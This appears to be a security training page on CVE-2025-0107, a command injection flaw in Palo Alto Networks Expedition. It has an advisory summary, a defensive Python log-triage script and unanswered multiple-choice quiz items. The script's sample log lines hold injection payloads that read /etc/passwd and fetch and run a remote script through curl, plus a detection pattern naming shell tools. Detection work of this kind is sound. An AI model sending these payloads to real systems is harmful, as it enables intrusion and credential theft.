CVE-2025-0107 is an OS command injection (CWE-78) vulnerability in Palo Alto Networks Expedition, the firewall configuration migration tool. Expedition releases prior to 1.2.101 are affected. An authenticated, low-privileged attacker can run arbitrary OS commands as the www-data user, which exposes the data Expedition holds: usernames, cleartext passwords, device configurations, and API keys for the firewalls it manages (sources: Palo Alto Networks advisory; SecurityOP; Innovate). NVD assigns a CVSS v4.0 base score of 7.7 (High): network attack vector, low attack complexity, low privileges required, no user interaction, and a high confidentiality impact that extends downstream to the PAN-OS devices whose credentials Expedition stores (sources: NVD; vulnerability.circl.lu).
Observed exploitation targets endpoints such as /API/regionsDiscovery.php, and CrowdSec's threat intelligence has reported widespread in-the-wild exploitation since mid-2025 (sources: app.crowdsec.net; Feedly).
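A triage script for the scenario above, added here as an example (it is not Palo Alto Networks code and not a confirmed exploit signature for this CVE). It checks whether an Expedition build is older than the 1.2.101 fix, then scans web-server access-log lines for requests to /API/regionsDiscovery.php whose query parameters carry shell metacharacters or common command names. The log lines are constructed for illustration, and the parameter name `region` is an assumption; the real vulnerable parameter is not given on this page, so the filter inspects every parameter rather than a named one.

```python
"""Triage helper for command-injection attempts against an Expedition host.

Added example, not part of the original page or of Palo Alto Networks' code.
Sample log lines are constructed; the endpoint path comes from the page, the
parameter names in the samples are assumptions.
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

FIXED_VERSION = (1, 2, 101)             # first fixed Expedition release
ENDPOINT = "/API/regionsDiscovery.php"  # endpoint named on the page

# Shell metacharacters that have no business in a region-discovery parameter.
# This is a triage heuristic to tune against your own traffic, not a WAF rule.
META = re.compile(r"[;&|`\n]|\$\(|\$\{|>\s*/|<\s*/")
# Command names that often appear in injected payloads (post-exploitation).
HINTS = re.compile(r"\b(curl|wget|nc|bash|sh|python3?|cat|id|whoami|base64)\b", re.I)

# Apache/nginx combined-format access log, request line split into its parts.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (assumed parameter name "region").
SAMPLE_LOG = [
    # benign use of the endpoint
    '10.0.0.5 - - [12/Jun/2025:09:14:02 +0000] "GET /API/regionsDiscovery.php?region=us-west HTTP/1.1" 200 512',
    # ';'-separated command injection attempt, percent-encoded
    '203.0.113.7 - - [12/Jun/2025:09:15:31 +0000] "GET /API/regionsDiscovery.php?region=us%3Bid%3Bcat%20/etc/passwd HTTP/1.1" 200 1987',
    # $(...) substitution fetching a second stage
    '203.0.113.7 - - [12/Jun/2025:09:15:40 +0000] "GET /API/regionsDiscovery.php?region=%24%28curl%20http%3A%2F%2F198.51.100.9%2Fx%7Csh%29 HTTP/1.1" 200 88',
    # same metacharacters on an unrelated path: out of scope for this filter
    '10.0.0.9 - - [12/Jun/2025:09:16:00 +0000] "GET /index.php?q=a%3Bb HTTP/1.1" 200 300',
]


def parse_version(version: str) -> tuple:
    """'1.2.100' -> (1, 2, 100); tolerates suffixes such as '1.2.100-h1'."""
    nums = re.findall(r"\d+", version)
    return tuple(int(n) for n in nums[:3])


def is_vulnerable(version: str) -> bool:
    """Expedition releases before 1.2.101 are affected."""
    return parse_version(version) < FIXED_VERSION


def suspicious_params(target: str) -> list:
    """Return (name, decoded_value) pairs on the endpoint that look like
    command injection; empty list for other paths or clean parameters."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return []
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already decoded once; decoding again catches %2528-style
        # double encoding that a naive filter would miss.
        decoded = unquote_plus(value)
        if META.search(decoded) or HINTS.search(decoded):
            hits.append((name, decoded))
    return hits


def triage(log_lines, version: str) -> dict:
    """Combine the build check with per-request findings from the access log."""
    attempts = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line, skip rather than guess
        hits = suspicious_params(m["target"])
        if hits:
            attempts.append({
                "ip": m["ip"], "ts": m["ts"], "method": m["method"],
                "status": int(m["status"]), "params": hits,
            })
    return {"vulnerable_build": is_vulnerable(version), "attempts": attempts}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_LOG, "1.2.100"), indent=2))
```

Access logs record only the request line, so this catches payloads delivered in the query string; if the endpoint is driven by POST bodies, the same `suspicious_params` check has to run on a reverse proxy or request-body log instead. A hit on a vulnerable build is a reason to treat every credential and API key stored in that Expedition instance as exposed, not just to block the source IP.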
Identify the exploit vector and privilege context related to CVE-2025-0107 OS Command Injection via /API/regionsDiscovery.php.
Question:
A security engineer notices suspicious traffic to /API/regionsDiscovery.php on an Expedition server.
Choose the vulnerability that is most likely being exploited:
A. CVE-2025-0103 (SQL Injection)
B. CVE-2025-0104 (XSS)
C. CVE-2025-0107 (OS Command Injection)
D. CVE-2025-0105 (File Deletion)
Determine the privilege context for OS command execution in CVE-2025-0107 exploitation.
Question:
What is the privilege context under which the attacker executes OS commands in CVE-2025-0107 exploitation?
A. root
B. www-data
C. administrator
D. no privileges
Identify the initial conditions required for exploiting CVE-2025-0107.
Question:
Which describes the initial attacker requirements for exploiting CVE-2025-0107?
A. Must be authenticated as an Expedition administrator
B. Must trick a user into clicking a link
C. Needs network access to the Expedition web interface and a low-privileged authenticated session
D. Must have local shell access
Determine the CVSS v4.0 severity score category for CVE-2025-0107.
Question:
CVE-2025-0107's CVSS v4.0 score is approximately:
A. 2.7 (Low)
B. 4.7 (Medium)
C. 7.7 (High)
D. 9.8 (Critical)
Identify the affected Expedition version(s) for CVE-2025-0107.
Question:
Which version of Expedition is affected by CVE-2025-0107?
A. 1.2.101 and later
B. 1.2.100 and earlier
C. Only version 1.2.101
D. All versions
Identify the CWE category for CVE-2025-0107 based on its OS command injection weakness.
Question:
CVE-2025-0107 is categorized under which CWE?
A. CWE-79 (Cross-site Scripting)
B. CWE-89 (SQL Injection)
C. CWE-78 (OS Command Injection)
D. CWE-73 (External Control of File Name or Path)
Summarize the real-world exploitation status of CVE-2025-0107.
Question:
Which statement about real-world exploitation of CVE-2025-0107 is correct?
A. No evidence of exploitation in the wild
B. CrowdSec reports increasing exploitation since mid-2025
C. Only limited exploitation via local plugins
D. Only exploited in controlled pentests
Identify the most effective immediate mitigation action for CVE-2025-0107.
Question:
What is the most effective immediate action to mitigate this vulnerability?
A. Reboot the server
B. Disable /API/regionsDiscovery.php endpoint
C. Upgrade Expedition to ≥ 1.2.101 or shut it down
D. Apply web application firewall (WAF) rules
Determine the range of assets at risk from CVE-2025-0107 exploitation.
Question:
What assets are at risk due to this vulnerability?
A. Only API keys
B. Usernames, passwords, device config, API keys
C. Firewall rules only
D. UI session tokens
Question:
In a CTF scenario, which simulated exploit would best demonstrate CVE-2025-0107?
A. SQL injection via /dbQuery.php
B. Stealing session via XSS in /userPanel
C. OS command injection via crafted GET to /API/regionsDiscovery.php
D. Deleting files via /deleteFile.php